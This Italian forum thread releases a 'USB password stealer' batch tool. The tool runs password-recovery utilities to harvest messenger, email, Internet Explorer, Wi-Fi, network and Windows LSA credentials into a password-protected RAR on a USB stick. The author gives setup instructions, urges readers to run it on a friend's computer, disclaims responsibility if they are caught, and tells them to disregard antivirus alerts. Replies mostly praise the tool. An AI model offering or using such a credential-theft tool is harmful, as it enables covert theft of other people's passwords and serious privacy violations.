• Regolamento Macrocategoria DEV
    Prima di aprire un topic nella Macrocategoria DEV, è bene leggerne il suo regolamento. Sei un'azienda o un hosting/provider? Qui sono anche contenute informazioni per collaborare con Sciax2 ed ottenere l'accredito nella nostra community!

[REL]PX Password Stealer USB 1.0

Pierlux

Utente Assiduo
Autore del topic
18 Agosto 2007
566
0
Miglior risposta
0
Salve a tutti ,
con una vecchia guida di Salvatore Aranzulla ( i diritti sn suoi quindi .. credo ) ho creato un file batch di dos che basandosi su dei programmi che salva tutti le password trovate in un computer , semplicemente inserendo una chiavetta usb. Le pass vengono salvate in formato html , inun file rar , protetto da password e cn un nome cn un muero a caso.
----------------
Questa opera è pubblicata sotto licenza Creative Commons:
88x31.png
Perfavore, Entra oppure Registrati per vedere i Link!

------------------
Istruzioni:
Scompattare l'archivio in una cartella vuota
Aprirlo

- Modificare la password che deve essere usata
Per modificare la password , aprire il file "gazza.bat
e modificare :
REM Compressione..
@rar.exe a -pPASSOWRDSCELTA NOMEFILE_%random%.rar *.html log.txt > nul
PASSOWORDSCELTA con la password desiderata ( consiglio una pass in maiuscolo)

- Modificare il nome dell'archivio in cui si salverà il log e le pass
APrire il file "gazza.bat" e modificare :
REM Compressione..
@rar.exe a -pPASSOWRDSCELTA NOMEFILE_%random%.rar *.html log.txt > nul
NOMEFILE con il nome del file desiderato .

Ci mette si e no una ventina di secondi..
se nn volete password che protegga l'archivio , lasciate la p minuscola e cancellare PASSWORDSCELTA.
Caricatelo sulla chiavetta , inseritelo in un pc di un amico , avviate gazza.bat e voilà
un archivio protetto da password generato nella chiavetta con dentro tutte le pass trovate.

.Buon divertimento!!
Non mi assumo nessuna responsabilità legale nè materiale ( Se fate danni ad altri , se vi scoprono o vi denunciano..)

Download:
Perfavore, Entra oppure Registrati per vedere i Link!


mspass - Trova le password dei messenger
search - Trova le ultime ricerche eseguite con google e vari
mailpv - trova password di Outlook e friends
wireless - Trova le password delle reti wireless memorizzate sul pc
iepv - Trova le password memorizzate da Internet Explorer
netpass - Trova le Password delle reti , anche delle connessioni.
lsasecretwiew -Trova molte password , di tutti i tipi , anche quella dell'account utente su cui si è eseguito .

Più avanti verranno fatte nuove versioni , con possibilità di trovare più password.
Se avete problemi scrivete pure io sn qui :-D

P.s: l'antivirus ve lo rivela cm virus .. ma nn vi preoccupate...e...potrebbe anche nn trovare password..nn è infallibile
 
Ultima modifica:
Bella guida..

complimenti anche se non l'hai fatta tu, ma almeno grazie di averla postata :emoji_slight_smile:
 
Forse mi sono espresso male..
questa guida l'ho fatta interamente io! Ma il prog l'ho creato con un'altra guida ( che nn è questa) , fatta da Salvatore Aranzulla , Anche se ci ho fatto qualche modifica!
 
Lo ho provato, è davvero stupendo!
Mitico, cmq la cosa della rete Internet è un pò troppo invasiva.
Nel senso che Kella opzione la potevi anche tolgiere poichè poi diventa DAVVERO una grande vilazione della Privacy!! :-(
Cmq Stupendo il programma :-)
 
Raga! non lo scaricate c'è un virus!

forse la lettura non è il tuo forte..

guarda alla fine del mex


P.s: l'antivirus ve lo rivela cm virus .. ma nn vi preoccupate...e...potrebbe anche nn trovare password..nn è infallibile



-.-